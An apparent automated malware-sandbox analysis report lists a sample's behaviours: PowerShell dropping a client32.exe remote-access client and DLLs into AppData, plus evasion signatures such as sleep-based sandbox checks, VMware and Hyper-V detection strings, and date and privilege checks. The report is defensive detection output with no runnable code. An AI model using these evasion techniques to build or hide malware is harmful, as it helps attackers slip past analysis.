Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Contains functionality to detect sleep reduction / modifications
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: 37_2_6CC94F30 37_2_6CC94F30
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: 37_2_6CC891F0 37_2_6CC891F0
Delayed program exit found
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: 37_2_110B8200 Sleep,ExitProcess, 37_2_110B8200
Contains functionality to query network adapater information
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: _memset,LoadLibraryA,GetProcAddress,GetAdaptersInfo,_malloc,GetAdaptersInfo,wsprintfA,_free,FreeLibrary, 37_2_6CC97F80
Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\System32\osk.exe Window / User API: threadDelayed 523 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 8623 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1254 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1453 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6933 Jump to behavior
Found dropped PE file which has not been started or loaded
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Options\HTCTL32.DLL Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Options\TCCTL32.DLL Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Options\jkosfe\vpnclient2.dll Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Options\remcmdstub.exe Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Options\rgakat\vpnclient2.dll Jump to dropped file
Found evaded block containing many API calls
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Evaded block: after key decision
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Evaded block: after key decision
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Evaded block: after key decision
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Evaded block: after key decision
Found evasive API chain (date check)
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Evasive API call chain: GetLocalTime,DecisionNodes
Found evasive API chain checking for process token information
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Check user administrative privileges: GetTokenInformation,DecisionNodes
Found large amount of non-executed APIs
Source: C:\Users\user\AppData\Roaming\Options\client32.exe API coverage: 5.7 %
May check if the current machine is a sandbox (GetTickCount - Sleep)
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: 37_2_6CC891F0 37_2_6CC891F0
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\osk.exe TID: 2980 Thread sleep time: -60000s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7480 Thread sleep count: 8623 > 30 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7480 Thread sleep count: 1254 > 30 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7072 Thread sleep time: -8301034833169293s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5340 Thread sleep time: -1844674407370954s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7392 Thread sleep count: 1453 > 30 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7616 Thread sleep count: 6933 > 30 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7640 Thread sleep time: -4611686018427385s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5912 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Source: C:\Users\user\AppData\Roaming\Options\client32.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Uses the system / local time for branch decision (may execute only at specific dates)
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: 37_2_6CC93130 GetSystemTime followed by cmp: cmp eax, 02h and CTI: je 6CC93226h 37_2_6CC93130
Uses threadpools to delay analysis
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Threadpool analyzer: Sleep duration: 300000ms
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Threadpool analyzer: Sleep duration: 300000ms
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Threadpool analyzer: Sleep duration: 300000ms
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Threadpool analyzer: Sleep duration: 300000ms
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Threadpool analyzer: Sleep duration: 300000ms
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Threadpool analyzer: Sleep duration: 300000ms
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Threadpool analyzer: Sleep duration: 300000ms
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Threadpool analyzer: Sleep duration: 300000ms
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Threadpool analyzer: Sleep duration: 300000ms
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Threadpool analyzer: Sleep duration: 300000ms
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Threadpool analyzer: Sleep duration: 300000ms
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Threadpool analyzer: Sleep duration: 300000ms
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Threadpool analyzer: Sleep duration: 300000ms
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Threadpool analyzer: Sleep duration: 300000ms
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Threadpool analyzer: Sleep duration: 300000ms
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Threadpool analyzer: Sleep duration: 300000ms
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Threadpool analyzer: Sleep duration: 300000ms
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Threadpool analyzer: Sleep duration: 300000ms
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Threadpool analyzer: Sleep duration: 300000ms
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Threadpool analyzer: Sleep duration: 300000ms
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Threadpool analyzer: Sleep duration: 300000ms
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Threadpool analyzer: Sleep duration: 300000ms
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Threadpool analyzer: Sleep duration: 300000ms
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Threadpool analyzer: Sleep duration: 300000ms
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Threadpool analyzer: Sleep duration: 300000ms
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Threadpool analyzer: Sleep duration: 300000ms
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Threadpool analyzer: Sleep duration: 300000ms
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Threadpool analyzer: Sleep duration: 300000ms
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Threadpool analyzer: Sleep duration: 300000ms
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Threadpool analyzer: Sleep duration: 300000ms
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Threadpool analyzer: Sleep duration: 300000ms
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Threadpool analyzer: Sleep duration: 300000ms
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Threadpool analyzer: Sleep duration: 300000ms
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Threadpool analyzer: Sleep duration: 300000ms
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: 37_2_1102D330 InterlockedIncrement,Sleep,Sleep,GetCurrentProcess,SetPriorityClass,SetEvent,Sleep,PostThreadMessageA,PostThreadMessageA,CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess, 37_2_1102D330
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: 37_2_11065890 _memset,_memmove,_strncpy,CharUpperA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA, 37_2_11065890
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: 37_2_1106A0A0 GetTickCount,OpenPrinterA,StartDocPrinterA,ClosePrinter,FindFirstFileA,FindClose,CreateFileA,SetFilePointer,GetTickCount,GetLastError, 37_2_1106A0A0
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: 37_2_111266E0 _memset,_memset,GetVersionExA,GetTempPathA,GetModuleFileNameA,_strrchr,CreateFileA,CreateFileA,WriteFile,CloseHandle,CloseHandle,CreateFileA,GetCurrentProcessId,wsprintfA,CreateProcessA,CloseHandle,CloseHandle,CloseHandle,CreateProcessA,DeleteFileA,Sleep,WaitForSingleObject,CloseHandle,GetCurrentProcess,RemoveDirectoryA,GetLastError,ExitProcess,FindNextFileA,FindClose,FindFirstFileA,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,GetModuleFileNameA,_strrchr,_memmove,GetThreadContext,VirtualProtectEx,WriteProcessMemory,FlushInstructionCache,SetThreadContext,ResumeThread,CloseHandle,CloseHandle, 37_2_111266E0
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: 37_2_1110AFD0 _memset,wsprintfA,wsprintfA,KillTimer,FindFirstFileA,wsprintfA,FindNextFileA,GetLastError,FindClose, 37_2_1110AFD0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 34_2_00007FFC8B7E3438 GetSystemInfo, 34_2_00007FFC8B7E3438
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: client32.exe, 00000025.00000002.2432223673.000000006CCC0000.00000002.00000001.01000000.00000014.sdmp Binary or memory string: VMware
Source: chrome.exe, 00000000.00000002.2431215679.000001E4A75D6000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2436349685.000001E4AB1CF000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V Dynamic Memory Integration Service
Source: explorer.exe, 00000016.00000002.2440811565.0000000008894000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: NXTORVMWare
Source: chrome.exe, 00000000.00000003.2330546951.000028EC04D70000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2329891050.000028EC04A68000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 5Hoj/QMQlrN27uj7H5QHmTsInWJHfccNk2UVK6ETXqx+fdfNSxrnavEgpatDDx1vMATx0pCTzdHAItQFwoJ4cX94Z1prk0k+HpyVm3aW08aZW+VdqhNN+vsWzPCPAZZiE+fIi5eBDITLPIqrb9t1Md7ubrDqYycWRQQEmUF3jfcGwlMekRkl4Nkl85RqJee2muJQiwEIH+CDK+CzCQ2lrnDQ+hqUEluKLkhMz/7hXiIJOEgIHJQr1dxUIlz91kJWh4Iul7davpjQd6IIt3Mnp2hR0rWDz8+ZWTQCQ13U1oC65XnbDZTswiB8vjvmkYT+8HoP9rS6/mSXC7IXx91zlvVDeDh5/4tPIhtV6Q82PUl0Fyip2ILK+/PPoDVwBOpchDpnju0DW2PsnB4LisW1WEZ7b9F7/ksGBLPhmHhXSvuEQsRLqA92KUS2+r0geo8whVNHZ+EX8kf7Art9UMoe80ec0yf0NprcvqXdzoDGw1Gzeg1YtYNHX3xcxZbamGgk5xOFGc6Qex03G7MvVG8jYjbrGBHp1x9oGHnpiTMFGBfIhxTopUNS2KcQ/8xpnypBymD/H0WS8s8jn8o0X35mivo8vtDTA95pr1nv3cNo78wP5ZSptCaYgADoG6o6h5Vwet6Pd/5nX/rH6XQg6m+h/O4unCB2pXHaxwj04cNjXCdcov4MMzMH7RgKKLn6ioKjztll35sUSyQaCW0hCYwgcFP1reCIB8x+p02ZSk66Kgk9yTZHb+SjgrPBwBSvp6O9TW0fhwfHHFu6ne6tKeE35QZfw0/Qsh8JNEBQZ9e9U7523ZknUEXDNab3atftuqwYudixqH6wUBDo1vTzxubK2wG+wvSldRddbcyoxLd651Sut6692sQsO6Ym59DVJG42S23BSF0sLYGKXMRsRc9rq9wpAmLb9P/k//ZBTB6Qd0plKhs3fekACyDEcikLaY9reD3c6DzT6L7O8FKTmNcxGhJ/9En4y6dRVdXUZw2JiFSikE9ruEQblbsveqBkNkLbh9/zKVTS6S7qy3CyNDSwvG8gkUoVn9Lfde0RhqMelaURaTIe0l9U4AP6SUWS4a4fUoL1sDcTd/OZbyGA\u003d\u003d\",\"interpreterSafeUrl\":{\"privateDoNotAccessOrElseTrustedResourceUrlWrappedValue\":\"//www.google.com/js/th/v15QCjm6WO3QEs80chG8QfS1HlFrDoWBLlSvxspkiuA.js\"},\"serverEnvironment\":1}}},\"videoFlags\":{\"playableInEmbed\":true,\"isCrawlable\":true},\"previewPlayabilityStatus\":{\"status\":\"OK\",\"playableInEmbed\":true,\"contextParams\":\"Q0FJU0FnZ0E\u003d\"},\"embeddedPlayerMode\":\"EMBEDDED_PLAYER_MODE_DEFAULT\",\"embeddedPlayerConfig\":{\"embeddedPlayerMode\":\"EMBEDDED_PLAYER_MODE_DEFAULT\",\"embeddedPlayerFlags\":{}},\"embeddedPlayerContext\":{\"embeddedPlayerEncryptedContext\":\"AD5ZzFTPLYxSer_R5PwkmZS-Tw4kib1_UG_YuM7PzprIn7h7HloFiT40fhwHmvTcbDZ5mAmX_gi3mQS0IvX9cIfuaL02Wqj7eTV8PMLoUpzaX-xPKwhnTeP7PCHG7qXu9THt\",\"ancestorOriginsSupported\":false}}","video_id":"h15NcT6UXh0"},"POST_MESSAGE_ORIGIN":"*","VIDEO_ID":"h15NcT6UXh0","DOMAIN_ADMIN_STATE":""});window.ytcfg.obfuscatedData_ = [];
Source: chrome.exe, 00000000.00000002.2436349685.000001E4AB1CF000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V Hypervisor>
Source: explorer.exe, 00000016.00000000.1609515483.0000000008772000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: BBSCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
Source: explorer.exe, 00000016.00000000.1602380186.0000000006EDD000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWystem32\DriverStore\en-US\machine.inf_loc
Source: chrome.exe, 00000000.00000002.2436349685.000001E4AB1CF000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V rytllcpqlndyltx Bus Pipes
Source: chrome.exe, 00000000.00000002.2436349685.000001E4AB182000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: JHyper-V Hypervisor Logical Processorft
Source: explorer.exe, 00000016.00000000.1599850643.00000000009A9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000E
Source: explorer.exe, 00000016.00000000.1600834236.0000000002D50000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware-42 27 b8 c1 67 22 50 4e-8b 1e 52 5b b1 3b 4a 34
Source: explorer.exe, 00000016.00000003.2247809094.000000000C5E5000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: War&Prod_VMware_SATA_CD00#4&224f42ef&0&00000
Source: explorer.exe, 00000016.00000000.1609515483.0000000008834000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: explorer.exe, 00000016.00000000.1609515483.00000000086D5000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware SATA CD0021-224I
Source: explorer.exe, 00000016.00000002.2440811565.00000000087F8000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
Source: chrome.exe, 00000000.00000002.2436349685.000001E4AB1CF000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V VM Vid Partition
Source: chrome.exe, 00000000.00000002.2436349685.000001E4AB1CF000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V Hypervisor Root Partition
Source: chrome.exe, 00000000.00000002.2436349685.000001E4AB1CF000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VHyper-V Dynamic Memory Integration Service
Source: explorer.exe, 00000016.00000000.1609515483.0000000008772000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: ;;SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: explorer.exe, 00000016.00000000.1609515483.00000000089C4000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
Source: chrome.exe, 00000000.00000002.2436349685.000001E4AB1CF000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V Virtual Machine Bus Pipes
Source: chrome.exe, 00000000.00000002.2436349685.000001E4AB1CF000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V Hypervisor{-
Source: explorer.exe, 00000016.00000000.1600834236.0000000002D50000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware20,1
Source: chrome.exe, 00000000.00000002.2436349685.000001E4AB199000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: THyper-V Hypervisor Root Virtual ProcessorDTs
Source: explorer.exe, 00000016.00000000.1600834236.0000000002D50000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware, Inc.NoneVMware-42 27 b8 c1 67 22 50 4e-8b 1e 52 5b b1 3b 4a 34VMware20,1
Source: chrome.exe, 00000000.00000002.2431215679.000001E4A7538000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: DHyper-V Virtual Machine Bus Pipest
Source: explorer.exe, 00000016.00000000.1600834236.0000000002D50000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware SVGA IIES1371
Source: explorer.exe, 00000016.00000000.1600834236.0000000002D50000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware Virtual RAM
